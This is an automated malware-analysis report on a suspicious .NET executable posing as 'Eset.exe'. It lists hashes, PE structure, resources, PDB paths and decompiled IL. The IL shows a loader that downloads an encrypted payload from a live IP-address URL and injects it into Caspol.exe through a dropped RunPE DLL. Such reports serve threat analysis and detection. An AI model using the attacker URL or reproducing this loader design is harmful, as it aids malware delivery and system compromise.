Suspicious
Suspect

87d483bb9aa6c6b8ce5cbf3447a3e25e

PE Executable
|
MD5: 87d483bb9aa6c6b8ce5cbf3447a3e25e
|
Size: 171.01 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Medium

Hash
 Hash Value
MD5
87d483bb9aa6c6b8ce5cbf3447a3e25e
Sha1
6d23530896c278d2518e66bd018980d75bdd7871
Sha256
3c196da64bb5abbd726e7cebb8366e53d4ef87f066c72b6056620fb1b42f84ae
Sha384
36c2cffd5922d765a59bc91cf0d3036e51ceb2ba705e327a16b13d6e3ef661c2392e8d331b30068fd4ada55cc3b60777
Sha512
fec699669b5a030b2553be34ec40e59a2b481c08385d21952374a4610796b9190668ac292e7256bd4102aaa7a671463aa46766057a4ce766d372a2604948032a
SSDeep
1536:NQZ7tHXsq7yinwehkM3EVVVVVtXgg8j/Hr8HKk3zy/Ek/9WCGFxEqPVMtrrtaLKe:aHsmyi5Q3zmIFxEqUlkCdMsl+
TLSH
DDF3194D57A8E933C6BD1BF4E0921A0183F4A607D9F2E7C968C129D20D573A1DB4A36F

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
87d483bb9aa6c6b8ce5cbf3447a3e25e
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
bin.Properties.Resources.resources
BLACKHAWK
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
I87KRmw0LvRLi8pQ00.x919IYhTeCsc3NCy8U
0lyMFIlkQUmJwSfdTM.fxdXUcqSIOOBQZ5xw1
nwj2e48f7vCVk5ROuV.INGExIEWfr0UijO2W3
Informations
Name
 Value
Module Name

Eset.exe
Full Name

Eset.exe
EntryPoint

System.Void bin.Launcher::Main()
Scope Name

Eset.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Eset
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

14
Main Method

System.Void bin.Launcher::Main()
Main IL Instruction Count

53
Main IL

nop <null> ldstr http://198.55.98.195/creat/bintxt.txt stloc.0 <null> call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() ldstr Caspol.exe call System.String System.IO.Path::Combine(System.String,System.String) stloc.1 <null> nop <null> ldloc.0 <null> call System.Byte[] bin.Launcher::FetchAndDecrypt(System.String) stloc.2 <null> ldloc.2 <null> brtrue.s IL_0025: ldloc.2 ldc.i4.0 <null> br.s IL_002A: stloc.3 ldloc.2 <null> ldlen <null> ldc.i4.0 <null> cgt.un <null> stloc.3 <null> ldloc.3 <null> brfalse.s IL_0053: nop nop <null> call System.String bin.Launcher::DropRunPEDLL() stloc.s V_4 ldloc.s V_4 call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0052: nop nop <null> ldloc.s V_4 ldloc.1 <null> ldloc.2 <null> call System.Void bin.Launcher::LoadAndRun(System.String,System.String,System.Byte[]) nop <null> nop <null> nop <null> nop <null> leave.s IL_0073: ret stloc.s V_6 nop <null> ldstr Critical failure: ldloc.s V_6 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_0073: ret ret <null>
Module Name

Eset.exe
Full Name

Eset.exe
EntryPoint

System.Void bin.Launcher::Main()
Scope Name

Eset.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Eset
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

14
Main Method

System.Void bin.Launcher::Main()
Main IL Instruction Count

53
Main IL

nop <null> ldstr http://198.55.98.195/creat/bintxt.txt stloc.0 <null> call System.String System.Runtime.InteropServices.RuntimeEnvironment::GetRuntimeDirectory() ldstr Caspol.exe call System.String System.IO.Path::Combine(System.String,System.String) stloc.1 <null> nop <null> ldloc.0 <null> call System.Byte[] bin.Launcher::FetchAndDecrypt(System.String) stloc.2 <null> ldloc.2 <null> brtrue.s IL_0025: ldloc.2 ldc.i4.0 <null> br.s IL_002A: stloc.3 ldloc.2 <null> ldlen <null> ldc.i4.0 <null> cgt.un <null> stloc.3 <null> ldloc.3 <null> brfalse.s IL_0053: nop nop <null> call System.String bin.Launcher::DropRunPEDLL() stloc.s V_4 ldloc.s V_4 call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_5 ldloc.s V_5 brfalse.s IL_0052: nop nop <null> ldloc.s V_4 ldloc.1 <null> ldloc.2 <null> call System.Void bin.Launcher::LoadAndRun(System.String,System.String,System.Byte[]) nop <null> nop <null> nop <null> nop <null> leave.s IL_0073: ret stloc.s V_6 nop <null> ldstr Critical failure: ldloc.s V_6 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void System.Console::WriteLine(System.String) nop <null> nop <null> leave.s IL_0073: ret ret <null>
Artefacts
Name
 Value
PDB Path

C:\Users\Administrator\source\repos\bin\bin\obj\Debug\Eset.pdb
PDB Path

BLACKHAWK.pdb
87d483bb9aa6c6b8ce5cbf3447a3e25e (171.01 KB)
File Structure
87d483bb9aa6c6b8ce5cbf3447a3e25e
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
bin.Properties.Resources.resources
BLACKHAWK
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
.Net Resources
I87KRmw0LvRLi8pQ00.x919IYhTeCsc3NCy8U
0lyMFIlkQUmJwSfdTM.fxdXUcqSIOOBQZ5xw1
nwj2e48f7vCVk5ROuV.INGExIEWfr0UijO2W3
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
PDB Path

C:\Users\Administrator\source\repos\bin\bin\obj\Debug\Eset.pdb

87d483bb9aa6c6b8ce5cbf3447a3e25e
PDB Path

BLACKHAWK.pdb

87d483bb9aa6c6b8ce5cbf3447a3e25e > .Net Resources > bin.Properties.Resources.resources > BLACKHAWK
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙